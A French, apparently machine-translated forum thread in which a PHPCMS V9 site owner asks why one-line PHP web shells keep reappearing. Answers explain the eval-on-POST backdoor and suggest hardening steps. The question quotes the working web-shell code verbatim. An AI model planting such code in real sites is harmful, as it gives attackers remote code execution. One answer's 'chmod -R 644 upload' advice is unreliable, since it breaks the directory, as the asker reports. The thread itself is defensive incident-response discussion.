Le programme du site Web a été envahi par un cheval de Troie [<?php eval($_POST[1]);?> ok]. Veuillez aider à découvrir le mécanisme ?

Question

Le site a été fréquemment attaqué par des hackers ces derniers temps. Nous demandons l'aide d'experts PHP pour clarifier notre réflexion afin de pouvoir trouver les failles au plus vite et résoudre nos soucis !

Maintenant, l'incident est décrit comme suit :

1. Le site Web est construit en utilisant la version par défaut de PHPCMS_V9_5.20.

2. Tous les fichiers sont initialement stockés dans le répertoire racine du serveur avec des autorisations entièrement ouvertes.

3. Plus tard, le site Web a été piraté et les fichiers d'entrée api.php et index.php ont été réécrits.

4. Le fichier de virus implanté est : « One Sentence Trojan ». Le contenu est le suivant :

<?php @eval($_POST['dcs-19']);?>
<?php

5. Après avoir découvert le problème, après l'avoir supprimé, verrouillez les autorisations de ces fichiers, pensant que cela résoudra le problème. Cependant, quelques jours plus tard, j'ai découvert que l'instantané du site Web avait été piraté. J'ai donc vérifié et supprimé à nouveau le cheval de Troie. Les résultats ont montré que l'emplacement du fichier du cheval de Troie se trouvait dans le dossier uploadfile20170527 du répertoire racine du serveur. . Ce fichier est automatiquement créé en fonction de la date lors du téléchargement des pièces jointes ou de la mise à jour des articles en arrière-plan. Cependant, l'article n'a pas été mis à jour le 27 mai, mais il est apparu, demandant l'aide d'experts pour enquêter sur la cause profonde du problème du site Web.

Le contenu du cheval de Troie est :

<?php eval($_POST[1]);?>
Pièce jointe supplémentaire : j'ai vérifié le contenu associé sur Internet, et la plupart d'entre eux ont déclaré qu'il s'agissait d'une attaque par injection SQL causée par des vulnérabilités d'un programme de site Web. Il a été suggéré de corriger la vulnérabilité, mais comment la corriger ? Est-il utile de mettre à jour la version PHP en ligne ?

【

Je ne suis pas une personne technique, donc je ne comprends pas beaucoup de choses, si vous ne comprenez pas quelque chose, je suivrai vos instructions et l'ajouterai lors des questions/réponses !

】

Answer 1

Le principe du code de cette phrase est très simple. POST fait référence aux données envoyées par le client, et eval signifie exécuter les données sous forme de code.
Pour les pirates, il vous suffit de saisir le code dans la boîte de dialogue de votre page Web, et il sera effectivement exécuté après soumission.

Ce n'est qu'un symptôme, c'est-à-dire que la porte dérobée est finalement partie, mais comment le pirate informatique est-il entré et a-t-il quitté la porte dérobée ? Il y a peut-être une vulnérabilité dans la fonction de téléchargement, le mot de passe ftp est cassé ? , les privilèges d'administrateur sont obtenus, etc. Enfin, quitter ce cheval de Troie n'est que pour des raisons de commodité la prochaine fois.

La chose la plus élémentaire que vous devez faire est de télécharger l'ensemble des codes, de parcourir tous les codes et de trouver tous les endroits liés à l'évaluation. S'ils ne sont pas nécessaires à votre propre programme, traitez-les tous. Sinon, si. vous en supprimez un ici, ils le refaireont ailleurs, c’est sans fin. La seconde consiste à combler les failles de gestion du système. Mettez à jour les composants du serveur s'ils peuvent être mis à jour. Modifiez tous les mots de passe et utilisez des mots de passe forts aléatoires. Ensuite, installez un logiciel antivirus sur le serveur. Je me souviens que j'avais déjà utilisé un serveur Linux open source. . Si vous oubliez le nom, recherchez-le.

Enfin, si cela ne fonctionne pas, laissez un professionnel voir si l'investissement en vaut la peine. Je me souviens qu'il existe des sites Web étrangers qui proposent des services de suppression des chevaux de Troie et de surveillance des modifications. Cela semble coûter un ou deux cents dollars chacun. année, ce qui est assez cher. Je ne sais pas s'il existe le même service en Chine.

Answer 2

Avis concernant la vulnérabilité PHPCMS
Chers utilisateurs :
Bonjour !
La dernière vulnérabilité exposée dans le programme PHPCMS en avril de cette année peut injecter des fichiers de chevaux de Troie PHP dans le site Web en modifiant les paramètres d'enregistrement des membres. Grâce aux tests de notre société, nous avons constaté que lors de l'inscription en tant que membre, PHPCMS cryptera les informations d'enregistrement puis les transmettra au serveur pour l'enregistrement du membre. Étant donné que la méthode de cryptage ne peut pas être déchiffrée temporairement, notre société ne peut pas intercepter les intrusions de pirates informatiques en faisant correspondre les informations correspondantes. mots-clés ;
Il existe actuellement trois solutions :

1. Mise à niveau vers le dernier programme PHPCMS

2. Fermez la fonction d'inscription des membres sur le site ;

3. Annulez l'autorisation d'exécution du répertoire uploadfile (cette méthode peut éviter l'exécution du cheval de Troie, mais ne peut pas éviter le téléchargement du fichier Trojan)
   Après avoir exécuté l'une des solutions ci-dessus, veuillez vérifier attentivement le répertoire et les sous-répertoires du fichier upload pour voir s'ils contiennent des fichiers PHP ; . Ce répertoire est destiné au téléchargement. Le répertoire de sauvegarde de l'image. Si un fichier PHP est trouvé, il doit s'agir d'un fichier Trojan ! Veuillez le supprimer rapidement !

Réseau Jingan
2017.6.19

Answer 3

Modifiez le mot de passe du serveur, modifiez le port par défaut SSH et remplacez le serveur par un autre serveur. Changé en PHPCMS, qui a cessé de se mettre à jour il y a 5 ou 6 ans. Il y a certainement beaucoup de lacunes.

Answer 4

权限问题, votre répertoire de téléchargement a des autorisations exécutables activées.
La solution au problème est d'éliminer les vulnérabilités de PHPCMS. Vous devez supprimer les autorisations exécutables des répertoires de tous les fichiers externes (codes qui ne sont pas écrits par vous ou par le framework).

chmod -R 644 upload

Answer 5

Les deux réponses ci-dessus : 你的上传目录开了可执行权限、取消uploadfile目录的执行权限
Qu'est-ce que cela signifie ? J'ai annulé l'autorisation d'exécution du répertoire, le répertoire ne peut pas être ouvert et je ne peux pas télécharger de photos si je le souhaite. Est-ce toujours correct ?